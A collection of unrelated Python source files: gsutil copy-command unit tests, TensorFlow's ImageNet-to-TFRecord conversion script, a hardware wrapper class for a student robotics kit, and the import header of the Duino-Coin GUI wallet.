cp_args = ['cp', suri(bucket_uri, '*'), temporary_directory]
threads = []
for _ in range(2):
thread = threading.Thread(target=self.RunGsUtil, args=[cp_args])
thread.start()
threads.append(thread)
[t.join() for t in threads]
self.assertEqual(len(os.listdir(temporary_directory)), test_file_count)
class TestCpUnitTests(testcase.GsUtilUnitTestCase):
"""Unit tests for gsutil cp."""
def testDownloadWithNoHashAvailable(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
object_uri.get_key().etag = '12345' # Not an MD5
dst_dir = self.CreateTempDir()
log_handler = self.RunCommand('cp', [suri(object_uri), dst_dir],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(2, len(warning_messages))
self.assertRegex(
warning_messages[0], r'Non-MD5 etag \(12345\) present for key .*, '
r'data integrity checks are not possible')
self.assertIn('Integrity cannot be assured', warning_messages[1])
def testDownloadWithDestinationEndingWithDelimiterRaisesError(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
destination_path = 'random_dir' + os.path.sep
with self.assertRaises(InvalidUrlError) as error:
self.RunCommand('cp', [suri(object_uri), destination_path])
self.assertEqual(str(error), 'Invalid destination path: random_dir/')
def test_object_and_prefix_same_name(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo/bar',
contents=b'bar')
fpath = self.CreateTempFile()
# MockKey doesn't support hash_algs, so the MD5 will not match.
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
self.RunCommand('cp', [suri(object_uri), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
def test_cp_upload_respects_no_hashes(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
log_handler = self.RunCommand('cp', [fpath, suri(bucket_uri)],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(1, len(warning_messages))
self.assertIn('Found no hashes to validate object upload',
warning_messages[0])
|
build_imagenet_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import six
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if six.PY3 and isinstance(value, six.text_type):
value = six.binary_type(value, encoding='utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
wrapper.py
|
"""
The module containing the `Robot` class
Mainly provides init routine for the brain and binds attributes of the `Robot`
class to their respecitve classes
"""
import json
import sys
import optparse
import os
import logging
import time
import threading
import random
from datetime import datetime
from smbus2 import SMBus
from robot import vision
from robot.cytron import CytronBoard
from robot.greengiant import GreenGiantInternal, GreenGiantGPIOPinList, GreenGiantPWM
_logger = logging.getLogger("robot")
# path to file with status of USB program copy,
# if this exists it is because the code on the robot has been copied from the robotusb
# this boot cycle. This is to highlight weird behaviour in the arena
COPY_STAT_FILE = "/tmp/usb_file_uploaded"
def setup_logging(level):
"""Display the just the message when logging events
Sets the logging level to `level`"""
_logger.setLevel(level)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(level)
fmt = logging.Formatter("%(message)s")
handler.setFormatter(fmt)
_logger.addHandler(handler)
class NoCameraPresent(Exception):
"""Camera not connected."""
def __str__(self):
return "No camera found."
class Robot():
"""Class for initialising and accessing robot hardware"""
_initialised = False
def __init__(self,
wait_for_start=True,
camera=None,
max_motor_voltage=6,
logging_level=logging.INFO):
self.zone = 0
self.mode = "competition"
self._max_motor_voltage = max_motor_voltage
self._initialised = False
self._start_pressed = False
self._warnings = []
self._parse_cmdline()
setup_logging(logging_level)
# check if copy stat file exists and read it if it does then delete it
try:
with open(COPY_STAT_FILE, "r") as f:
_logger.info("Robot code copied %s from USB\n", f.read().strip())
os.remove(COPY_STAT_FILE)
except IOError:
pass
self.subsystem_init(camera)
self.report_hardware_status()
self.enable_12v = True
type(self)._initialised = True
# Allows for the robot object to be set up and mutated before being set
# up. Dangerous as it means the start info might not get loaded
# depending on user code.
if wait_for_start is True:
start_data = self.wait_start()
self.zone = start_data['zone']
self.mode = start_data['mode']
else:
_logger.warning("Robot initalized but usercode running before"
"`robot.wait_start`. Robot will not wait for the "
"start button until `robot.wait_start` is called.")
def subsystem_init(self, camera):
"""Allows for initalisation of subsystems after instansating `Robot()`
Can only be called once"""
if type(self)._initialised:
raise RuntimeError("Robot object is acquires hardware locks for its"
" sole use and so can only be used once.")
self.bus = SMBus(1)
self._green_giant = GreenGiantInternal(self.bus)
self._adc_max = self._green_giant.get_fvr_reading()
self._gg_version = self._green_giant.get_version()
self.servos = GreenGiantPWM(self.bus)
self.gpio = GreenGiantGPIOPinList(self.bus, self._adc_max)
self.motors = CytronBoard(self._max_motor_voltage)
self.camera = vision.RoboConPiCamera() if camera is None else camera()
if not isinstance(self.camera, vision.Camera):
raise ValueError("camera must inherit from vision.Camera")
self._vision = vision.Vision(self.zone, camera=self.camera)
def report_hardware_status(self):
"""Print out a nice log message at the start of each robot init with
the hardware status"""
battery_voltage = self._green_giant.get_battery_voltage()
battery_str = "Battery Voltage: %.2fv" % battery_voltage
# we cannot read voltages above 12.2v
if battery_voltage > 12.2:
battery_str = "Battery Voltage: > 12.2v"
if battery_voltage < 11.5:
self._warnings.append("Battery voltage below 11.5v, consider "
"changing for a charged battery")
if self._gg_version != 3:
self._warnings.append("Green Giant version not 3 but instead {}".format(self._gg_version))
camera_type_str = "Camera: {}".format(self.camera.__class__.__name__)
#Adds the secret poem every now and then!
if random.randint(0,100) == 1:
_logger.info("Today your task is a challenging one")
_logger.info("Gifts for the wizard and deliveries to run")
_logger.info("But due to the unfortunate timing you can not go")
_logger.info("So you have sent a robot with gifts in tow")
_logger.info("You start in your country with your gifts around")
_logger.info("Starting in your home (where ever it is found)")
_logger.info("Then taking gifts from your robots zone ")
_logger.info("Delivering it to the wizard on its own")
_logger.info("To the road is good and to the emerald palace is ideal ")
_logger.info("And if in another country you get some but a point they will steal")
_logger.info("There are many things that are to be considered")
_logger.info("But remember to bring your gifts for the wizard")
# print report of hardware
_logger.info("------HARDWARE REPORT------")
_logger.info("Time: %s", datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
_logger.info("Patch Version: 0")
_logger.info(battery_str)
_logger.info("ADC Max: %.2fv", self._adc_max)
_logger.info("Green Giant Board: Yes (v%d)", self._gg_version)
_logger.info("Cytron Board: Yes")
_logger.info("Motor Voltage: %d", self._max_motor_voltage)
_logger.info(camera_type_str)
_logger.info("---------------------------")
for warning in self._warnings:
_logger.warning("WARNING: %s", warning)
if not self._warnings:
_logger.info("Hardware looks good")
@property
def enable_12v(self):
"""Return if 12v is currently enabled
I (Edwin Shepherd) can't query this from the GG for some reason? but can
on Jacks Fallens? @will can you test this on a more default brain?
The code bellow seems to make my pi reboot (most of the time)
The code will make the OS, blank screen then go to the rainbow
bootscreen almost instantly. Doesn't seem to matter if it is run as
root.
I have plugged a scope into the 5V rail to make sure that the pi
wasn't suddenly losing power and it doesn't seem to be, maybe I'm
missing the edge. I think its software on the pi?
On Jacks BB the bits doesn't change when read back even though its set
and unset
import time
from smbus2 import SMBus
I2C_ADDR = 0x8
ENABLE_12V_REGISTER = 27
bus = SMBus(1)
for state in (True, False, True):
print("setting state to {}".format(state))
bus.write_byte_data(I2C_ADDR, ENABLE_12V_REGISTER, int(state))
time.sleep(1)
print("{0:b}".format(bus.read_byte_data(I2C_ADDR, ENABLE_12V_REGISTER)))
"""
return self._green_giant.enabled_12v
@enable_12v.setter
def enable_12v(self, on):
"""An nice alias for set_12v"""
return self._green_giant.set_12v(on)
def stop(self):
"""Stops the robot and cuts power to the motors.
does not touch the servos position.
"""
self.enable_12v = False
self.motors.stop()
def _parse_cmdline(self):
"""Parse the command line arguments"""
parser = optparse.OptionParser()
parser.add_option("--usbkey", type="string", dest="usbkey",
help="The path of the (non-volatile) user USB key")
parser.add_option("--startfifo", type="string", dest="startfifo",
help="""The path of the fifo which start information
will be received through""")
(options, _) = parser.parse_args()
self.usbkey = options.usbkey
self.startfifo = options.startfifo
def _wait_start_blink(self):
"""Blink status LED until start is pressed"""
v = False
while not self._start_pressed:
time.sleep(0.2)
self._green_giant.set_status_led(v)
v = not v
self._green_giant.set_status_led(True)
def _get_start_info(self):
"""Get the start infomation from the fifo which was passed as an arg"""
f = open(self.startfifo, "r")
d = f.read()
f.close()
self._start_pressed = True
settings = json.loads(d)
assert "zone" in settings, "zone must be in startup info"
if settings["zone"] not in range(4):
raise ValueError(
"zone must be in range 0-3 inclusive -- value of %i is invalid"
% settings["zone"])
self._start_pressed = True
return settings
def wait_start(self):
"""Wait for the start signal to happen"""
if self.startfifo is None:
self._start_pressed = True
_logger.info("No startfifo so using defaults (Zone: {})".format(self.zone))
return
blink_thread = threading.Thread(target=self._wait_start_blink)
blink_thread.start()
_logger.info("\nWaiting for start signal...")
# This blocks till we get start info
start_info = self._get_start_info()
_logger.info("Robot started!\n")
return start_info
def see(self) -> vision.Detections:
"""Take a photo, detect markers in sene, attach RoboCon specific
properties"""
return self._vision.detect_markers()
def __del__(self):
"""Frees hardware resources held by the vision object"""
logging.warning("Destroying robot object")
# If vision never was initialled this creates confusing errors
# so check that it is initialled first
if hasattr(self, "_vision"):
self._vision.stop()
type(self)._initialised = False
|
Wallet.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Tkinter GUI Wallet (v2.52)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
import sys
from base64 import b64decode, b64encode
from configparser import ConfigParser
from datetime import datetime
from json import loads
from json import loads as jsonloads
from locale import getdefaultlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from socket import socket
from sqlite3 import connect as sqlconn
import subprocess
from threading import Thread, Timer
from time import sleep, time
from tkinter import (BOTH, END, LEFT, RIGHT, Button, Checkbutton, E, Entry,
Frame, IntVar, Label, Listbox, N, PhotoImage, S,
Scrollbar, StringVar, Tk, Toplevel, W, messagebox, ttk)
from tkinter.font import Font
from urllib.request import urlopen, urlretrieve
from webbrowser import open_new_tab
from requests import get
# Version number
VERSION = 2.52
# Colors
BACKGROUND_COLOR = "#121212"
FONT_COLOR = "#fffdee"
FOREGROUND_COLOR = "#ff9f43"
